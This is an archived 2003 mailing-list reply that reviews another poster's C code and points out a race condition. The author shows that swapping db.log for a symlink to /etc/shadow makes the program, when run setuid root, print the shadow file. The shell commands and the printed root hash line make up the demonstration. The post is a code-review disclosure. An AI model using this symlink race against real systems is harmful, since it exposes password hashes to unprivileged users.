> > /* read log */ > if ( (f1 = fopen("db.log", "r")) == NULL) > return 1; > if (fgets(bfp, BFSIZE, f1) == NULL) > return 1; > ...and if db.log is perhaps a symlink to /etc/shadow? I assumed the program would be chown'd to root, and set 4755. If this is an invalid assumption, well, no point in reading any further. I compiled the program, stopped it after it writing the input log, made a symlink, and resumed running the program, with lovely results: [tcannon@needle]$ rm db.log [tcannon@needle]$ ln -s /etc/shadow db.log [tcannon@needle]$ fg ./a.out a a root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7::: I like race conditions. No point in wasting your CPU -- that shadowed password did get modified before I sent it to the list :-) Cheers, --tcannon PS: Nice strcpy
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 10:39:30 PDT